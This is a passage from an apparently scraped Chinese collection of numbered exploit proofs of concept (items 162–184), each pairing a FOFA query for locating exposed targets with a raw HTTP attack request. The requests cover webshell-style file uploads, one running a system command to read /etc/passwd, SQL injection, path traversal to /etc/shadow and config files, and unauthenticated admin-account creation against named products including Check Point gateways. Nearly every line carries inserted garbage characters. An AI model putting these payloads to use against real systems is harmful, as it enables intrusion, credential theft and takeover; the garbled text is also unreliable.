http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"0 v: ]; R( x+ b2 E" {
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
( ^* }) u2 P; t9 [- y/ C# X<soap:Body>+ E8 p7 f8 T9 M0 p) C, [
<UploadResume xmlns="http://tempuri.org/">" v1 k7 p# w! v5 V/ c
<ip>1</ip> u- F; G, n3 ?+ X' Y
<fileName>../../../../dizxdell.aspx</fileName>
8 K* T6 m, F1 y5 ?% t- B& r<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
/ u5 X9 H+ D+ N6 w2 M<tag>3</tag>
% L2 f/ Q, o$ W% W</UploadResume>
: Z* l$ k6 u0 H# z, P& \9 @8 U</soap:Body>: K2 L5 C6 v0 ?; V$ T% @# I- I
</soap:Envelope>
8 ?" W W3 A) p, W5 Q! ^6 J8 \7 N- M4 p8 ?5 d, E
+ m; j5 E; K, G6 F% n" l1 y) q+ w/ M, ohttp://x.x.x.x/dizxdell.aspx% \; F. v* i0 ^ `
0 b: j- Z7 P9 p2 f( y
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传: I6 u8 x2 o/ y/ F/ D5 M
FOFA: app="和丰山海-数字标牌": J; ^3 y- W% K! Z! K+ n; x, J
POST /QH.aspx HTTP/1.1
! R5 G4 k4 Y W! I1 N- g4 @Host: x.x.x.x/ v' D: |! A P# R9 v% d* }, u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0. q& L; R h0 y0 q8 I
Connection: close
9 g& \. W1 R" S" M5 {) z, F/ X8 vContent-Length: 5830 O8 l' T! {$ W) u/ R8 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
) f' c# b7 L" e! X2 EAccept-Encoding: gzip. ]! b1 G8 ]9 D. h
* }( I8 Q/ L! e: l% y------WebKitFormBoundaryeegvclmyurlotuey
% n2 w7 e$ h4 H% w8 E; \1 UContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"! J- T' M$ J& s* ~
Content-Type: application/octet-stream
8 R- a1 Z' X) \, \! i0 F; R
8 b6 R& [4 ^- v7 r: p- ?) n/ i3 [5 l<% response.write("ujidwqfuuqjalgkvrpqy") %>( [2 i6 r6 i( R& _% p- g
------WebKitFormBoundaryeegvclmyurlotuey
: ]$ ~( _! o4 r( Y! s- r$ W) U% JContent-Disposition: form-data; name="action"
, C# |, n# }% h
- p6 ^1 r3 a4 |upload& C* ^& K2 N# v! ^
------WebKitFormBoundaryeegvclmyurlotuey) y0 t x* f, n0 ]% X( b
Content-Disposition: form-data; name="responderId", C, b( q0 R. A& f* O F3 S
$ ]; W; \) [+ a& E- e
ResourceNewResponder9 V3 L- e9 P$ H
------WebKitFormBoundaryeegvclmyurlotuey5 f# {$ J+ `5 R: a' B
Content-Disposition: form-data; name="remotePath"
4 J+ ]2 e& l9 I$ K' W8 c- t; i6 K6 t7 Z. @
/opt/resources
1 U# x% O' m: z f3 U2 L------WebKitFormBoundaryeegvclmyurlotuey--; p! J2 o# J6 B8 H9 V7 w
: [* h- V2 u$ g- W; {; @5 @, y
5 n |1 W' p ?; X9 [4 |* d* ]http://x.x.x.x/opt/resources/kjuhitjgk.aspx/ m$ s }) ?: z1 Q
4 `( [$ y. ]5 J5 h! Q" R, R" h3 w
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 V% e3 U; G1 u" [9 p6 o2 Q' K
FOFA: icon_hash="-795291075"/ k" w/ S' B' G4 x, k+ p$ I* D
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1: }' Z7 V+ g- I+ x& u
Host: x.x.x.x1 [6 t: N1 y4 ?, H2 c# Z) V3 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
" U$ O- h! L0 B8 X# G8 R. vConnection: close
$ N) `6 f/ i6 m3 g; ~6 O gContent-Length: 293. x! u" l7 s) \; B. c! q6 X
Accept: */*& f' {0 ]' _# w. ~1 p
Accept-Encoding: gzip, deflate
9 R$ M/ C: [/ L0 v5 z4 N& b8 a% {Accept-Language: zh-CN,zh;q=0.91 k# s2 s9 K* Z; D% E9 N4 o
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod) ]. y' B- ], _& c `
6 Q5 c+ |: u1 G------iiqvnofupvhdyrcoqyuujyetjvqgocod) w" f, {) P% k& i2 e0 G
Content-Disposition: form-data; name="name"3 n' S' @ V) h, U" O
4 @1 g! V+ P% p( A) @0 K1.php" {9 c% {' ?- Z% ^
------iiqvnofupvhdyrcoqyuujyetjvqgocod# |6 T3 W4 s, M
Content-Disposition: form-data; name="upfile"; filename="1.php"$ p b8 ^3 |2 w0 H) j
Content-Type: image/jpeg" {# d( h7 ]9 Y( R
3 k' v$ E6 [$ S1 t0 P1 r
rvjhvbhwwuooyiioxega
) ?1 _3 A" l: n; J. L" T1 x------iiqvnofupvhdyrcoqyuujyetjvqgocod--
; C8 D. Z# M' U2 [5 t* Y1 d5 i% K2 T3 s
7 ~" K4 N7 U1 L; E2 @* F( X
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传( A5 s) N+ \4 @ e
FOFA: title="智慧综合管理平台登入"7 r7 p9 q- j. \/ T
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.17 |8 K! ]" |1 s" B
Host: x.x.x.x, V4 _/ G- P9 |( F" Z2 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
$ L' H0 j Q4 C# m, tContent-Length: 288) m7 Q, v* s1 }( V7 A3 O% X
Accept: application/json, text/javascript, */*; q=0.015 [2 j4 _4 c: u& S/ r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
# N$ w, E8 b- h6 _4 C/ X0 V9 u( DConnection: close& _$ I# P3 g# j: [
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl! x3 ?/ [1 k* `0 R1 V, C: e
X-Requested-With: XMLHttpRequest
$ Z9 X# V P' Q& D4 d- o: ZAccept-Encoding: gzip' d% D5 ^. u) `. M
7 q c' `4 h" T k# i- y% g2 Y------dqdaieopnozbkapjacdbdthlvtlyl, S; f+ h) W3 t8 X( J0 u
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
2 l* U3 C, s6 x* C9 hContent-Type: image/jpeg, N# H/ p8 q, w
# w1 I" d' ~- S
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
3 O. @* ~7 T$ \9 U------dqdaieopnozbkapjacdbdthlvtlyl--( Z; W! Q1 Z# {' w; Y- q4 I
4 t0 W8 D& t' \; Z6 { ~# ~" J& h( `. i8 c9 |* B' K6 o
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx0 Z6 I; l9 a2 c( Q
( @7 p; P8 o8 J6 j; [$ X* {- |# |4 v165. OrangeHRM 3.3.3 SQL 注入; F# C8 v- `; @% |: M( \* ~
CVE-2024-36428* t- T; Q2 {0 m7 H5 V$ J l1 h+ }
FOFA: app="OrangeHRM-产品"
" B/ F/ V! m. x8 S* OURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
" F, T0 V* J. [; u. A& X5 z( E7 x! c& C7 l* ^5 }8 H. @& q
) `, k$ T7 H' J6 j166. 中成科信票务管理平台SeatMapHandler SQL注入
3 O* E5 I J% I2 H% B+ \4 r$ ]1 TFOFA:body="技术支持:北京中成科信科技发展有限公司"
- L0 F" h* ?1 _" ]; fPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.18 t1 l8 \5 G n' C% T
Host:5 j( P! H0 ~9 [2 @6 j1 s! F
Pragma: no-cache2 }( p, i3 W* D* A L
Cache-Control: no-cache w( r9 L. B, G3 I1 W
Upgrade-Insecure-Requests: 1
3 R% e' i. e" w% l7 B7 v3 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" y$ t# l& p1 M0 e4 v7 G7 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" `1 c- \2 p1 t5 g$ {6 BAccept-Encoding: gzip, deflate R, t4 g+ C% I6 n. t( X2 [$ z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8# e) P( D- Q! W" o
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
V% P0 o5 I5 b1 {7 J7 b( ~* iConnection: close
' d) p: F! V. N1 c/ rContent-Type: application/x-www-form-urlencoded) T. Q+ \6 ~) o4 A. i
Content-Length: 89
2 S8 |& X$ P8 o. H# O' g6 @
% v8 q, E% z$ n; V% e, FMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE3 U1 H4 M& A6 ?! I9 ~7 p
3 D P' r2 x, y/ @+ ^
# g9 C% G( K; q3 ?1 s
167. 精益价值管理系统 DownLoad.aspx任意文件读取
2 Q6 M# X# N( WFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"4 ]- d( R. b# ~$ O! Y% H- C4 `
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1: c1 m) |! ^- f# D. W8 w
Host:7 P$ d, m9 f% p) Q( a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ |# c: B0 M+ ]5 Q$ ]. A* M6 l, f
Content-Type: application/x-www-form-urlencoded7 H, M- i5 Z( q0 _ A
Accept-Encoding: gzip, deflate7 i7 d. ?( b- Q4 n) V
Accept: */*- c2 q4 m6 j( m+ c3 m& n9 ~
Connection: keep-alive
1 K2 d# T5 ~3 v" Y7 L
0 M, @+ z+ j% s! [. _
E* _) Q& w# E. }0 v( T168. 宏景EHR OutputCode 任意文件读取
4 o. k+ ]( e9 n, j, p8 g6 c* Q3 sFOFA:app="HJSOFT-HCM"
! s7 H2 I# N" ?GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
3 E+ m- V3 \; `" N: P6 ^1 VHost: your-ip- A/ E! I0 ]1 r( h2 v! U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
& Y0 E D1 i9 k: h2 d# Y: I% iContent-Type: application/x-www-form-urlencoded* z: F0 Q$ K" L+ i
Connection: close
/ i6 A3 S; l2 Y1 @ F- f9 M" \, S" G# W
! A$ A! a6 m; f# `. e
$ j# r& F+ O/ p) D3 Q; S3 b169. 宏景EHR downlawbase SQL注入1 O1 j, X2 P. s, c
FOFA:app="HJSOFT-HCM"
% O2 ? C6 C- P( X) l( b1 EGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
" r0 _/ f$ Y& kHost: your-ip( ]) q$ \) ?3 D; d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 Q# a' V9 d7 u( L, q6 u
Accept: */*
2 U6 v+ b. K0 OAccept-Encoding: gzip, deflate; T& u+ f5 X+ y! G! r
Connection: close8 o( s$ C9 b& a# w, A8 A
" Z: r: x/ e+ Q/ S/ `/ l! h+ D1 o9 p; s: p
6 ?8 e1 e' ^3 T) d" z* h& K2 r7 u( e' G. A/ f+ m* `+ g
170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 R$ g3 g+ s9 N I- t7 ^
FOFA:body="/general/sys/hjaxmanage.js"
% {$ _# m/ S. j9 c8 Z- Y# ^2 B! tPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
, @0 ^9 y$ R N- d; x/ rHost: balalanengliang: m) n$ m6 x. w
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 G/ n! ~% p: P: Q' IContent-Type: application/x-www-form-urlencoded
+ s2 H- J! @3 ~$ f8 N
9 \) e. n5 s3 u! \7 d$ v0 L1 ]filename=../webapps/ROOT/WEB-INF/web.xml
/ y. L# O u0 O# t1 p. C! W: l% x0 m1 P4 C1 i& |: Y# H
" f- v S1 q; @' [* A i; M3 [
171. 通天星CMSV6车载定位监控平台 SQL注入
% ]$ Y7 B0 w$ ^/ V; B( _- }FOFA:body="/808gps/"
0 c- U) p, ]" M$ F w. q6 t" _GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
i$ c3 u/ q9 G5 z' O: \8 S5 jHost: your-ip
8 h! y1 V; p% A5 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- J9 l5 `$ u# Z) L+ SAccept: */*
" e) k; F9 a; v5 `$ n0 U; IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 g' U5 T: }$ r7 t/ a9 M: M
Accept-Encoding: gzip, deflate
! k+ ~9 k; c/ z0 GConnection: close
5 M2 {) X F- c% z$ K2 c. [2 u0 e; Q I- v @6 r0 [5 t
# Z( W3 |; I6 S B0 `& I4 h8 y
) N1 C/ {% M) L: d172. DT-高清车牌识别摄像机任意文件读取% y5 |* O v& m$ k1 n/ ~4 `2 u( F" v
FOFA:app="DT-高清车牌识别摄像机"* k" l, \5 d2 f0 X
GET /../../../../etc/passwd HTTP/1.1
' x( l# @/ g6 X* w: j1 Q) jHost: your-ip
* |# W% e1 E! c1 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 y6 |" L4 x- j/ O6 gAccept-Encoding: gzip, deflate# P- g! N% B: P
Accept: */*
) X1 J; B# ^# y8 |0 D2 x6 Y) p0 BConnection: keep-alive
0 C3 R1 e. b; O/ b d4 N- ` D1 c
* S* }+ k" b# J9 t: ^6 M" y
* r5 \ E' Q0 l2 ?
5 K `. _4 ^2 E% p1 }" D8 _173. Check Point 安全网关任意文件读取
- z E: U2 R* G7 ] V2 o7 }8 s, eCVE-2024-24919) L; i: I4 }' `& K- B$ k( V; H
FOFA:app="Check_Point-SSL-Network-Extender"
! G# i2 _. ^, APOST /clients/MyCRL HTTP/1.1/ G, V! y( R# i f
Host: your-ip
+ M7 E8 f% L: y8 ~" H; BContent-Type: application/x-www-form-urlencoded
# I" t( @5 ^' A- u# E) e
7 H2 w3 p: }; V" s$ b) }0 g! q" iaCSHELL/../../../../../../../etc/shadow
% g ]; i: Z+ E! Z& Q1 x: y: S
) h8 @$ ]& ^% I4 I3 m8 a
, W2 Y' p+ [& c5 {) l2 M7 k% B* C/ V- H4 G8 L7 O/ P, ?3 n$ }
174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 y0 q% ^. c9 `7 |% J( J& [
FOFA:app="金和网络-金和OA"
: k8 A; [' B- G& GGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1& y8 T) R6 M7 U
Host: your-ip: { Z& f" e( |1 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, O: N; K5 e& TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ G+ L2 p6 l0 x5 W& m( W
Accept-Encoding: gzip, deflate, br
. [$ R8 ]; v$ i7 \8 NAccept-Language: zh-CN,zh;q=0.9
* ?! }% f+ n9 z0 q5 \& UConnection: close
% f9 R- G- d1 t0 V; ~$ G
& M. q5 c# Q& v3 C+ J
: v, y2 o3 m$ ^$ j
- m9 `0 o% K/ ] y5 w3 [8 u175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; K5 i* P# E6 n8 H: N6 K8 o7 NFOFA:app="金和网络-金和OA"
4 P: \2 Z! Q& I. p' F' MGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
! M" r$ O5 F* w0 g! ^4 J+ |0 u& k: sHost:+ n+ ?: u) e! q' z7 h( U& n V
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 y: @5 j5 ~& p$ L- Z0 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 C0 m' ^- M& H% a- LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 _) F) v( _0 n9 I6 d
Accept-Encoding: gzip, deflate0 g$ ]3 l. m0 W, o* q; ?, R) F
Connection: close
! [' h' x+ |/ j) p7 x8 CUpgrade-Insecure-Requests: 1. \: Z) G% q" d! E& h
" q/ U( Y- G4 ]! A n) g$ k
" k- d; Y8 O' M176. 电信网关配置管理系统 rewrite.php 文件上传8 \5 z% o( q% ]3 V" U5 U& q
FOFA:body="img/login_bg3.png" && body="系统登录"
$ l! @' t3 [( _) p1 \& R) @# _POST /manager/teletext/material/rewrite.php HTTP/1.1$ `" ?8 O( O* ?; L6 m/ l+ B
Host: your-ip- F* @5 h5 J* ~+ b4 e) l& ]2 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
7 B! {; v- c% i+ e- ]( WContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
, q+ B& } t; Z; ^6 f* b; y* aConnection: close0 X7 j# M/ v" D+ v7 N+ `
% J* B* y! E: C1 `0 ~; u/ A& T
------WebKitFormBoundaryOKldnDPT# s9 T W6 N' G
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
5 B: T; h0 C, E2 ?Content-Type: image/png
$ c+ E7 p1 Z1 v9 C* S
; R# [$ `( Z S( i% n<?php system("cat /etc/passwd");unlink(__FILE__);?>1 M! u/ ?6 F! |; e
------WebKitFormBoundaryOKldnDPT
" k4 `- K) j# x2 Y6 _Content-Disposition: form-data; name="uploadtime"
3 B K9 ]0 R6 l, R4 O0 S1 K1 F
* B- R: t/ X- a* [5 G N3 u
( l/ n, E! O% I( ^------WebKitFormBoundaryOKldnDPT--4 @0 H$ Q T4 h
1 y& }* e5 R# P, A, K' a& u! g
) y) X- ?+ B1 f1 `$ W# u
& w& u& C1 l- H/ I1 V+ }- C1 K( f! P177. H3C路由器敏感信息泄露
; N& _5 n% T7 ]. y/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
% X6 K, |: H0 v. h* m/userLogin.asp/../actionpolicy_status/../M60.cfg
" o6 E* ?( p+ m& I1 c$ r2 ]9 ~/userLogin.asp/../actionpolicy_status/../GR8300.cfg3 r8 B: G8 v$ w, x
/userLogin.asp/../actionpolicy_status/../GR5200.cfg7 e. S" @1 M) I0 U* n" q; I
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
' C3 _" T% Y9 k0 U( v) s1 x3 M/userLogin.asp/../actionpolicy_status/../GR2200.cfg/ C9 t4 S- |3 O; P8 P i; S
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg# W; \; s: F5 v4 s
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg6 e8 z5 u0 \+ L7 n
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg0 {- `8 R' w% \- M5 N; A
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg a0 V$ g& S# ?
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
5 I& O9 ^9 {6 u) t* C' y" h/userLogin.asp/../actionpolicy_status/../ER5100.cfg
: x; P! h, H/ ^* o# v/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
: k8 j- A6 x( \/ z$ ?7 ^: G/userLogin.asp/../actionpolicy_status/../ER3260.cfg
* B6 i. r( I+ i3 I) A( ^/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
7 }. T- e) y J0 Q6 \/userLogin.asp/../actionpolicy_status/../ER3200.cfg4 h" v6 L# P( N; Z" e
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
' ]& M: Z$ k, h: M; U/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
6 Q. K7 o: G' W1 t( u/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg# O: z) M; C4 f7 E }7 ^& k! d- L
/userLogin.asp/../actionpolicy_status/../ER3100.cfg' j# t x/ y' j/ w
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg. n$ B' j0 G. D7 W( t3 q
4 B5 A4 f! X$ @( R% q2 u; K
! q9 n; m$ J$ [7 x: g+ d$ F6 H178. H3C校园网自助服务系统-flexfileupload-任意文件上传
& }) z! y' q% u/ U: e% L; V8 ]FOFA:header="/selfservice"
" @+ {) e7 n% R5 J8 s" Q. mPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.12 e: S- C7 j* I) z
Host:8 y7 G3 f: l) [+ v' c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 n; w2 T: k s, x* i: {9 B1 V' c4 nContent-Length: 252' g% l) ]% L% X# p: G1 Z9 I! e1 r
Accept-Encoding: gzip, deflate
8 G6 r( K( |8 W5 e, aConnection: close
! \. X3 n6 ^9 j* u( Q5 l0 p. RContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l+ u* ~: }: o- `9 v/ ?/ Z+ O' D/ x5 H
-----------------aqutkea7vvanpqy3rh2l/ A2 g; ^' o1 Y2 B1 r
Content-Disposition: form-data; name="12234.txt"; filename="12234"0 x' c- @9 r5 ^" c
Content-Type: application/octet-stream, _/ L0 I8 b- p- `( U2 }0 p4 V
Content-Length: 255! @9 O& N) a" i
! Z- d3 t/ n" f
12234
1 g. L8 B8 v) }-----------------aqutkea7vvanpqy3rh2l--
: m% K6 g2 r# w2 q
& C8 p+ F# c& X% ^+ F, k: h- N* [0 D7 b
GET /imc/primepush/%2e%2e/flex/12234.txt
" f- Q, c' ~ j/ h+ A; ~0 @( F8 t9 o
9 h, B) f" o/ X) T3 _
179. 建文工程管理系统存在任意文件读取& }# V- j$ C$ \, t$ H) t8 m7 I. a7 T
POST /Common/DownLoad2.aspx HTTP/1.1
# V# I3 @ P# `% b8 T1 wHost: {{Hostname}}4 g. a7 D: V0 Q% y% z H
Content-Type: application/x-www-form-urlencoded
6 C6 P( x8 p/ }4 H& p/ h* {User-Agent: Mozilla/5.0: A3 U3 Z4 J; w' }" D4 _
6 b5 U! t& }5 G6 K2 `/ R! U
path=../log4net.config&Name=4 o; X* ^( z! t
8 H& Q/ H1 @& N
/ s+ K6 d# @1 `5 z1 N180. 帮管客 CRM jiliyu SQL注入) f4 |; v0 k9 [/ t+ [8 q2 \
FOFA:app="帮管客-CRM"
; o: A% @& F3 eGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
" q* I: Z- X% E% uHost: your-ip- m4 l7 r( G% P$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: u+ D% a- v0 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ c/ g6 u4 n' y
Accept-Encoding: gzip, deflate
0 A2 G* |# Z4 rAccept-Language: zh-CN,zh;q=0.9
' B2 G+ o( j) I" j( O9 F) yConnection: close
, Z# f% z# e* @/ Z
' F# N# T* {( H& M0 Q% }9 X- L
6 W; N! n& n$ g7 V" K" _181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
4 A. f. e. r3 Z# P4 m+ Y5 YFOFA:"PDCA/js/_publicCom.js". W1 d$ z( @: o" N7 g# m
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1& e& q$ s a+ @
Host: your-ip
0 U" G- {" \0 ^( Y7 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36; `1 t. k) g; k6 Y% f2 R" N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
j7 m& z. a6 PAccept-Encoding: gzip, deflate, br& A4 b" a2 Y' z2 q# G% A
Accept-Language: zh-CN,zh;q=0.9
+ v4 C' r6 f% LConnection: close) Z/ q; B/ u9 T4 h7 S
Content-Type: application/x-www-form-urlencoded$ ]1 G* K) | l u# J1 _
% A c$ E8 Q% }3 ~$ y7 L M+ D5 F8 Q! N: c
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
7 u2 K k7 `- m# m6 G6 x8 Q
/ M/ r# K. Y" d3 I* W2 w+ _/ v1 a# N
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建* n x' h4 D' u( {1 N0 P
FOFA:"PDCA/js/_publicCom.js"
- O5 W n& T* w" q/ v o( ]6 aPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.19 D! e1 S; ~. M e. h- b
Host: your-ip* k3 I$ e( n' q0 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) ]$ |7 B! T, a1 l: h* `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 }. ^3 f6 ]/ B, M* F# U
Accept-Encoding: gzip, deflate, br5 C6 n7 A4 S( P) N
Accept-Language: zh-CN,zh;q=0.9# ]* F$ C: v0 q- J( [8 Q, B
Connection: close
4 V* ?2 O; l d. ~Content-Type: application/x-www-form-urlencoded
# A3 ^1 V, V- K9 ?8 p T/ e
( |- t* g3 S5 j2 T$ u* [+ Q2 I. j' K# p& P# b
username=test1234&pwd=test1234&savedays=1
- p; E* h% f0 E6 [0 p8 |3 V( S( y) C
2 x, W2 n+ C" ~" i6 G; w
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
0 G. ?* u1 Y1 ?; FFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"$ S# s( C9 B& @, _% x
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1+ z7 h3 Q& m& G# `. r
Host: your-ip7 ~; V2 G( j+ G+ j
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
) k: J* v1 E# h$ \8 `. MAccept-Charset: utf-85 o7 i3 h+ T# Z# |/ N# ]
Accept-Encoding: gzip, deflate5 S$ v) j7 P. ~1 S8 a# I" o* `
Connection: close7 w; W2 Q( o+ ]
3 Q$ A. V$ Y' e0 F2 _
* X2 c; t9 @& G6 [* v3 q! M184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
, |6 t, }, K) S: H& D( pFOFA:server="SunFull-Webs"; v& B+ S3 x$ h* `; ~8 p- F
POST /soap/AddUser HTTP/1.1- W4 |( L7 K# G
Host: your-ip
; ?* H, D# ~9 W- w0 i6 sAccept-Encoding: gzip, deflate3 V# O3 d- u2 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0) K. @/ F. V% w( f& H
Accept: application/xml, text/xml, */*; q=0.014 w/ Y7 R; ?$ g q+ @
Content-Type: text/xml; charset=utf-8
Z. ^6 T- @ e4 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ l( d" |- r4 o2 o3 qX-Requested-With: XMLHttpRequest0 F" \. y1 ^4 w9 v7 A$ s
' D$ v0 i9 s& u1 {' Z6 c3 q( B b: V! f1 E$ m; G# ~
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
